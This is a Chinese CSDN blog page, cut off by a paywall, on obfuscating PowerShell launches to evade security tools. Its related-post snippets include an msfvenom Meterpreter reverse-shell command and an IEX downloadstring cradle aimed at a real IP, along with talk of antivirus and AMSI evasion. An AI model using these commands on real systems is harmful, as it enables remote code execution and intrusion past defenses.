powershell代码混淆绕过

已于 2022-04-04 23:46:29 修改
阅读量1.4k 收藏 2
点赞数
分类专栏: powershell 文章标签: 安全
于 2020-06-21 15:03:27 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_41082546/article/details/106885750
版权
powershell 专栏收录该内容
8 篇文章 1 订阅 ¥9.90 ¥99.00
订阅专栏

目前大多数攻击者已经将PowerShell 利用在了各种攻击场景中,如内网渗透,APT攻击甚至包括现在流行的勒索软件中。powershell的功能强大且调用方式十分灵活。

1. cmd启动powershell

首先看看powershel使用cmd.exe启动执行代码的方式:

1.1 常规方法

cmd.exe /c "powershell -c Write-Host SUCCESS -Fore Green"

cmd.exe /c "echo Write-Host SUCCESS -Fore Green | powershell -"

cmd /c "set p1=power&& set p2=shell&& cmd /c echo Write-Host SUCCESS -Fore Green ^|%p1%%p2% -"

1.2 管道输入流

cmd.exe /c "echo Write-Host SUCCESS -Fore Green | powershell IEX $input"

1.3 利用环境变量

cmd.exe /c "set cmd=Write-Host ENV -Fore Green&&powershell IEX $env:cmd"

cmd.exe /c "set cmd=Write-Host ENV -

了解本专栏 订阅专栏 解锁全文
Micr067
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
订阅专栏
Ladon九种PowerShell命令混淆加密免杀方法
K8哥哥
11-02 1686
九种方式随机混淆PowerShell代码,防止管理员轻易还原,至少比默认明文或Base64隐蔽。 Base64就不说了是个人都能解,一是常用,二是工具多,管理员懂解很正常,所以不推荐。 Ladon提供的混淆方法,每点一次按钮就随机会生成不同的命令,但是执行的都是同个功能 管理员想反查就得每一条都研究如何解密,给管理员增加难度,就是给自己增加控制时间。 更新功能 GUI 2020.10.18 [+] PowerShell转EXE,EXE转PowerShell EXE->Powershell PowerS
PowerShell混淆相关
JiangBuLiu的博客
06-18 288
????????????相关技术文章2016.05.26-[利用机器学习检测恶意PowerShell](https://bbs.pediy.com/thread-230002.htm)2018.11.09-[FireEye - 基于机器学习的模糊命令行检测](https://www.fireeye.com/blog/threat-research/2018/11/obfuscated-command-line-detection-using-machine-learning.html)2018.11.28-
powershell 中的字符串混淆
lacoucou的专栏
06-23 389
例子1 (VarIaBLE '*MDr*').naMe[3,11,2]-JoiN'' 执行结果是 iex 解析: PS > VarIaBLE '*MDr*' #执行命令 variable '*MDr' Name Value
探秘Chimera:绕过安全防护的PowerShell代码混淆利器
最新发布
gitblog_00031的博客
05-14 380
探秘Chimera:绕过安全防护的PowerShell代码混淆利器 项目地址:https://gitcode.com/tokyoneon/Chimera 在网络安全的世界里,总有那么一些工具,它们的存在既是对安全挑战的回应,也是对技术创新的致敬。Chimera就是这样一款工具,它是一款专门设计用来绕过AMSI(Antivirus Message Signaling Interface)和杀毒软件...
免杀对抗-PowerShell-混淆+分离
xiaoheizi的博客
09-15 709
解码代码:$xx=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String($DoIt))被火绒杀死了,这个火绒真的搞不懂,只经过base64编码的让过了,经过base64编码又混淆的反而被杀。1.将文件模式的powershell使用Windows PowerShell ISE 打开,将文件中变量进行base64编码.3.命令模式powershell执行——直接将cs生成的txt文件中的命令复制到命令行执行。
Powershell绕过执行及脚本混淆
hl1293348082的专栏
03-28 1224
为什么需要 powershell ?存在必然合理。微软的服务器操作系统因为缺乏一个强大的 Shell 备受诟病。而与之相对,Linux 的 Shell 可谓丰富并且强大。 Windows Server 的 Shell,也就是从 Dos 继承过来的命令行,处理简单问题尚可,一旦遇到稍微复杂一点的问题,它就会把本已复杂的问题,弄得更加复杂。 引入 VBScript,使得 WindowsServer 管理员处理问题的效率提高了不少。但 VBScript 是个脚本语言,即缺乏 Shell 的简单性,也不能.
Powershellery:此回购包含用于一般黑客的Powershell脚本
04-07
3. **隐蔽通信**:Powershell支持HTTP/HTTPS协议,使得黑客可以利用它进行隐蔽的数据传输,绕过防火墙和入侵检测系统。 4. **持久化机制**:黑客可以通过编写Powershell脚本来注册自启动项,确保即使系统重启也能...
Invoke-Obfuscation-Bypass + PS2EXE 绕过主流杀软1
08-03
混淆后的脚本使得杀毒软件难以解析其内部行为,从而可能绕过静态分析。 在描述中提到,通过将 Invoke-Obfuscation 应用到 C# 生成的 PowerShell 脚本上,然后使用 PS2EXE 工具将其转换为exe文件,可以有效地绕过...
ApplicationWhitelistBypassTechniques:应用程序白名单绕过技术目录
07-14
7. **利用系统工具**:一些系统自带的工具,如PowerShell或cmd,可能被用来执行恶意脚本,绕过白名单控制。 8. **时间戳欺骗**:通过修改文件的时间戳,使白名单检查时认为文件是最新的,从而绕过基于时间的检查。 ...
第一百零六课:windows 单机免杀抓明文或hash [通过简单混淆编码绕过常规静态检测]1
08-03
本课程主要探讨如何通过混淆、编码以及反射加载等技术来绕过常规的静态检测,从而执行如Mimikatz这样的工具来抓取明文或哈希密码。 首先,简单混淆是一种常见的免杀手段。在描述中提到的例子中,使用了`sed`命令对...
PowerHub:基于Web应用程序的后期开发工具,专注于绕过端点保护和应用程序白名单
05-13
哦,您还可以使用PowerSploit的模块在内存中完全运行任意二进制文件(PE和Shell代码),这有时对绕过应用程序白名单很有用。 您的赃物(Kerberos票证,密码等)可以通过命令行或Web界面轻松地以文件或文本片段的...
Pcalua+Powershell混淆
reaido的博客
01-29 281
一、Pcalua加载shellcode 1、msfvenom生成shellcode msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=39.104.56.140 LPORT=7100 -f psh-reflection > a.ps1 2、混淆处理 powershell "$a='IEX((new-object net.webclient).downloadstring(''ht';$b='tp://39.104.56.140:7200/a.
免杀对抗-Powershell-混淆无文件
m0_62172162的博客
04-25 800
免杀对抗-Powershell-混淆无文件
APT污水 - 使用多阶段高度混淆PowerShell在内存中运行
JiangBuLiu的博客
05-31 4490
通过恶意宏开启多阶段高隐藏攻击链拥有历史传承的社工手法????宏入口UserForm2.Gladiator_CRKUserForm1注册表PowerShell 拥有历史传承的社工手法???? 文档打开后会通过模糊图片和文字欺骗受害者启用宏。宏代码运行后会弹出虚假的提示,表示“由于版本不兼容所以无法查看文档。”等: 污水这个显示效果和文字内容已经使用很久了: 宏 入口 从宏代码的入口就可以发现这个攻击链有一些特殊,并不是所有代码都放在默认的位置一次性执行。先从入口的“Document_Open()”函数执
powershell恶意脚本解混淆
信息安全
11-11 1725
文章目录前言分析总结 前言 现在许多病毒作者为了免杀,使用powershell脚本来执行恶意行为的病毒越来越多,这次分析的一个样本就是利用powershell混淆来隐藏嵌在其中的cs后门dll 分析 样本代码 从图上可以很清晰的知道存放了一段base64数据,首先将base64数据解密,使用gzip解压,解压的数据进行执行 想要解密,也很简单: IEX用于将字符串作为命令执行,当去掉IEX后,再文件尾加上| out-file decode.txt 将 IEX (New-Object IO.StreamRe
论文解读 --- 《针对PowerShell脚本的有效轻量级去混淆和语义感知攻击检测》
罗斯839的博客
04-15 1504
一种有效的混淆代码还原方法
记一次powershell混淆(2)
weixin_30342827的博客
03-30 631
样本地址 https://www.hybrid-analysis.com/sample/4b4b8b13c264c8f7d7034060e0e4818a573bebc576a94d7b13b4c1741591687f?environmentId=100# 样本使用ConvertTo-SecureString加密字符串。 代码 powershell "([RUNTiME.iNTeRopsErV...
powershell 混淆案例
03-31
以下是一个简单的 PowerShell 混淆案例: 原始代码: ``` $processes = Get-Process foreach ($process in $processes) { Write-Host $process.Name } ``` 混淆代码: ``` $POwErshElL = "$([char[]](80,79,119,101,114,83,104,101,108,76,32,78,97,109,101,61,39,71,101,116,45,80,114,111,99,101,115,115,39,59,102,111,114,101,97,99,104,32,40,36,78,97,109,101,32,105,110,32,36,78,97,109,101,115,41,123,87,114,105,116,101,45,72,111,115,116,32,36,78,97,109,101,46,78,97,109,101,125))" IEX $POwErshElL ``` 混淆代码使用了 ASCII 编码中的字符数组,将原始代码中的变量名称和命令名称替换为了 ASCII 编码中的对应字符。此外,混淆代码还使用了 IEX 命令来执行混淆后的代码,从而进一步隐藏其意图。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Micr067

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值